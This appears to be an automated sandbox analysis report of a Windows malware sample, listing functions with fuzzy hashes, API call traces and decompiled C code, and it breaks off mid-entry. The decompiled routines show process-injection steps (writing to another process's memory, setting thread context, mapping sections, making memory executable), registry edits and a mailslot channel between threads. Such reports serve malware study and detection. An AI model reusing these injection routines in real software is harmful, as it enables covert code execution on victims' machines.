  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B3278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001F1040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226 Total matches: 134native
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Function 01B33E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B32E04, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 251 Total matches: 146registrystringmemory
Similarity
  • Total matches: 146
  • API ID: RegCloseKeyRegQueryValueExlstrcpy$CreateDirectoryHeapFreeRegOpenKey$RegCreateKeyRegDeleteValueRegOpenKeyExRtlAllocateHeapStrChrlstrcmpilstrlen
  • String ID: (
  • API String ID: 3095632906-3887548279
  • Opcode ID: 94967647f14b4038a7c87927226b8276d3bfedb75998008a5caceb4601cf75e0
  • Instruction ID: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
  • Opcode Fuzzy Hash: 73318B4607CED746D12B5C8204727A7A295EFE2F44DACF33974217D6990F603B2A5B84
  • Instruction Fuzzy Hash: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
APIs
  • StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
  • lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
  • RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
  • lstrlenW.KERNEL32 ref: 01B32ECC
  • RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
  • lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
  • HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B3464F: lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
    • Part of subcall function 01B3464F: lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
    • Part of subcall function 01B3464F: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
    • Part of subcall function 01B3464F: wsprintfW.USER32 ref: 01B3469A
    • Part of subcall function 01B34172: lstrlenW.KERNEL32(01B32F7A,01B342EB,00000000,?,?,01B32F7A,00000000), ref: 01B3417B
    • Part of subcall function 01B34172: memcpy.NTDLL(00000000,01B32F7A,00000000,00000000,01B342ED,?,?,01B32F7A,00000000), ref: 01B341A5
    • Part of subcall function 01B34172: memset.NTDLL ref: 01B341B9
  • lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
    • Part of subcall function 01B32B25: SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
    • Part of subcall function 01B32B25: CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
    • Part of subcall function 01B32B25: FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
  • lstrcpy.KERNEL32(?,?), ref: 01B32FEE
  • RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
  • RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
  • RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
  • RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
  • RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
  • RegCloseKey.ADVAPI32(?), ref: 01B330BA
  • RegCloseKey.ADVAPI32(?), ref: 01B330C3
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
  • RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 001D7CFA, Relevance: 13.6, APIs: 9, Instructions: 114 Total matches: 65memorystring
Similarity
  • Total matches: 65
  • API ID: VirtualProtect$GetLastErrorlstrcpylstrlen
  • String ID:
  • API String ID: 208590223-0
  • Opcode ID: c5fcf50122d35def001d29232e694ba35af908110bc64aa401ca479f181033be
  • Instruction ID: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
  • Opcode Fuzzy Hash: 18F04E475442424BEDC63DC4165325AED98EFD3D9481C6373FE161499642902225FF2D
  • Instruction Fuzzy Hash: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
APIs
  • lstrlen.KERNEL32(74C08500,?,00000000,001CD8AF,?,001EB068), ref: 001D7D47
  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D59
  • lstrcpy.KERNEL32(00000000,74C08500), ref: 001D7D68
  • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D79
  • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DA7
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DC2
  • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DFE
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E18
  • GetLastError.KERNEL32(?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E1F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B314CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 50136b8a9ad019f77738c7d2695a80d9cfa58a10d54e3dd229c6b48dc4baf302
  • Instruction ID: 33d9b5e3af68464c4ee12d6cec6cbf656236a2a99d1b1536a0d5b0eb5269df1d
  • Opcode Fuzzy Hash: 2ED0A7C10F5D4412085E48CC143A5A300CAEC2171527BAE2F3439681A14B52311D0EC9
  • Instruction Fuzzy Hash: 33d9b5e3af68464c4ee12d6cec6cbf656236a2a99d1b1536a0d5b0eb5269df1d
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 01B314D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,01B38000,?,?,01B3180F,00000000,?,01B37494), ref: 01B314FF
  • FindWindowA.USER32(01B38640,00000000,?,?,01B3180F,00000000,?,01B37494), ref: 01B31515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,01B3180F,00000000,?,01B37494), ref: 01B31520
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B31093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 01B31673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
